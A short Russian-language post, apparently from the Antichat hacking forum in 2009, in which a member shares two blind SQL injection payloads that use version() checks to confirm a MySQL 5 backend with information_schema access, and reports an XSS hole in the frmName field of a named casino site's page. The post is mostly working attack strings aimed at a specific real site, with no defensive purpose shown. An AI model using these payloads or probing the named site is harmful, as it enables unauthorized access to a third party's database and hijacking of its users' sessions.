
03.03.2009, 23:09
|
|
Members of Antichat - Level 5
Регистрация: 09.05.2008
Сообщений: 304
Провел на форуме: 7875940
Репутация:
2362
|
|
Немного уточню, тк сидел раскручивал:
' and 1=if((select substring(version(),1,1)=4),1,(select 1 from information_schema.tables))/*
' and 1=if((select substring(version(),1,1)=5),1,(select 1 from information_schema.tables))/*
=> 5й мускул с доступом к information_schema.
XSS
http://wmcasino.org/lobby/generate.php
Поле frmName
Если нет привязки сессии к ип и не чекается реферер, тогда это можно отнести к уязвимости.
|
|
|